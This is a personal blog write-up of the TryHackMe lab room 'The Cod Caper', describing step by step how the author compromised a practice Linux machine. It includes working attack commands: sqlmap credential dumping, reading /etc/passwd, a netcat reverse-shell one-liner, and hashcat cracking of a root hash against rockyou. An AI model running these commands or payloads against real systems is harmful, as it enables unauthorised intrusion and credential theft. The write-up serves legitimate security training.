TryHackMe: The Cod Caper Write-Up

A guided room taking you through infiltrating and exploiting a Linux system.

Posted by Siddharth Balyan on November 06, 2020 · 6 mins read

The Cod Caper

A guided room taking you through infiltrating and exploiting a Linux system.

Starting with Rustscan to find open ports and pipe the info to nmap.

❯ rustscan -a -- -sC -sV -oN nmap_results

Ports 22 and 80 seem to be the only one open.

Pasted image 20201105223335

Things that stand out here:

  1. 22: OpenSSH 7.2p2 Ubuntu
  2. 80: Apache HTTPd 2.4.18

Since, SSH is rarely ever a target for extensive enumeration, we can try to enumerate the web servers for some hidden directories.

❯ gobuster dir -u "" --wordlist=/usr/share/dirbuster/directory-list-2.3-medium.txt -t 75 -x "php,txt,html"
Tag Meaning
dir Directory Search
u URL to enumerate
--wordlist The wordlist to use for enumeration
-t The number of CPU threads to use
-x The file extension to enumerate

Thoughts: I usually only enumerate the directory, not being able to find a directory, made me realise I should enumerate file extensions too.

On enumerating file extensions, we get a directory.

Pasted image 20201106012435

Since this is a PHP Login form and PHP Login Forms are usually vulnerable to SQLi attacks, let’s try to see if it’s vulnerable to SQLi.

On entering ' in the Username field we get an error, thus confirming the earlier suspicion.

Pasted image 20201106011710

To do the injection, lets use sqlmap to test and find the credentials.

❯ sqlmap -u "" --forms --dump

Tag Meaning
-u Specifies the URL to attack
--forms To automatically select the <form> elements from the page
--dump To retrieve data from the database once the SQLi is found.

On running sqlmap we find the required credentials.

Thoughts: This was my first brush with sqlmap and trying to understand its working was quite insightful

Once we login with the creds we see that,,, we can run arbitrary commands through the webserver??????? Really weird for this to happen but I’ll roll with it.

Now that we can run commands here, we can view what files there are in the current directory using ls;

Pasted image 20201106014258

Or see the users on the system using;

cat /etc/passwd;

Pasted image 20201106014456

It’s better to get a shell on the system now. Let’s try one of the payloads from highoncoffee. The OpenBSD payload for netcat works here;

mkfifo /tmp/lol;nc 1337 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Thoughts: It took me some time to figure out that I just needed to use another payload to get things to work. I should try to use different things when I get stuck.

Pasted image 20201106015112

To find the file where the password is stored as instructed by the room, we use the find command

Pasted image 20201106020436

Thoughts: Trying to find this file was a bit annoying because I was unable to properly use the find command to retrieve the file. I need to do more practice in finding files and learn this command fully.

Inside this file is the required SSH password. Logging in with SSH; ❯ ssh pingu@

Now that we have a proper shell to the machine, we should enumerate the machine using My favourite way to do this is through hosting a server on a local directory with the script and download it on the Target-Machine.

After getting the script on the server, run it to find the juicy stuff and the interesting SUID file.

Thoughts: All these are things I am a bit more familiar with so it was more fun.

As the room instructs, the SUID file takes in the shadow file in the memory; expects 32 characters of input and then exits. Following the instructions, we conduct binary exploitation.

The binary exploitation will ultimately lead to dropping of the shadow file with the root hash. We can run this through hashcat using ❯ hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

And this gives us the final password!

Thoughts on the room: This was quite an interesting room, definitely going to read up on binary exploitation later. Apart from that, I’ve realise that I should just keep doing more rooms.